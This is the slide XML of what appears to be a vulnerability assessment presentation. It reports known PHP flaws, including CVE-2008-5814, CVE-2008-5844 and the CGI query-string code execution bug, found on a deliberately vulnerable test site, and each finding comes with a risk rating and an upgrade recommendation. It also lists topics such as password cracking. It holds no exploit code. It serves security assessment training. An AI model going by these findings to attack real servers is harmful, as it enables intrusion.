            <a:ext cx="592183" cy="339634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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174" name="Google Shape;174;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9257211" y="4005943"/>
            <a:ext cx="592183" cy="33963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175" name="Google Shape;175;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10868297" y="4005943"/>
            <a:ext cx="592183" cy="33963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7"/>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rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.6 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="1497874"/>
            <a:ext cx="10580914" cy="3143794"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="44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rgbClr val="333333"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="889798"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>6. PHP &lt; 5.2.8 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="187" name="Google Shape;187;p18"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="358375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2238100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is earlier than 5.2.8. As such, it is potentially affected by the following vulnerabilities :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- PHP fails to properly sanitize error messages of arbitrary HTML or script code, would code allow for cross-site scripting attacks if PHP's 'display_errors' setting is enabled.(CVE-2008-5814)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Version 5.2.7 introduced a regression with regard to 'magic_quotes' functionality due to an incorrect fix to the filter extension. As a result, the 'magic_quotes_gpc' setting remains off even if it is set to on. (CVE-2008-5844)</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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58375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                                      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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780925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t> This would allow </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>context-dependent attackers to read the contents of arbitrary memory locations via a crafted value of the third argument for an indexed image.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>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58375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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747425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.2.8 or later.</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188" name="Google Shape;188;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7280366" y="3936274"/>
            <a:ext cx="522514" cy="374469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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189" name="Google Shape;189;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9204960" y="3936274"/>
            <a:ext cx="522514" cy="374469"/>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190" name="Google Shape;190;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11007634" y="3936274"/>
            <a:ext cx="522514" cy="374469"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="944445"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.8 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653143" y="1654630"/>
            <a:ext cx="10816046" cy="3056708"/>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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="44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id="64" name="Google Shape;64;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261390" y="0"/>
            <a:ext cx="12263120" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;65;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6373091" y="2770909"/>
            <a:ext cx="2004291"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cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>VA ON TEST WEBSITE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;66;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9236364" y="2863273"/>
            <a:ext cx="2105891"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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>VA ON HOST MACHINE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;67;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6373091" y="5606473"/>
            <a:ext cx="193040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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>PASSWORD CRACKING</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9236364" y="5532521"/>
            <a:ext cx="2863274"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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>HIDING VIDEO BEHIND AN IMAGE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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647086" y="889798"/>
            <a:ext cx="7747977" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>7. PHP &lt; 5.3.12 / 5.4.2 CGI Query String Code Execution</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="202" name="Google Shape;202;p20"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="365425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2236100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is earlier than 5.3.12 / 5.4.2, </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An error in the file 'sapi/cgi/cgi_main.c' can allow a remote attacker to obtain PHP source code from the web server or to potentially execute arbitrary code. In vulnerable configurations, PHP treats certain query string parameters as command line arguments including switches such as '-s', '-d', and '-c'.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Note that this vulnerability is exploitable only when PHP is used in CGI-based configurations. Apache with 'mod_php' is not an exploitable configuration.</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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65425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                               HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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780225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>  The attacker can potentially affect the web server by a remote code execution and information disclosure   </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>  vulnerability.</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65425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1059275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.3.12 / 5.4.2 or later. </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
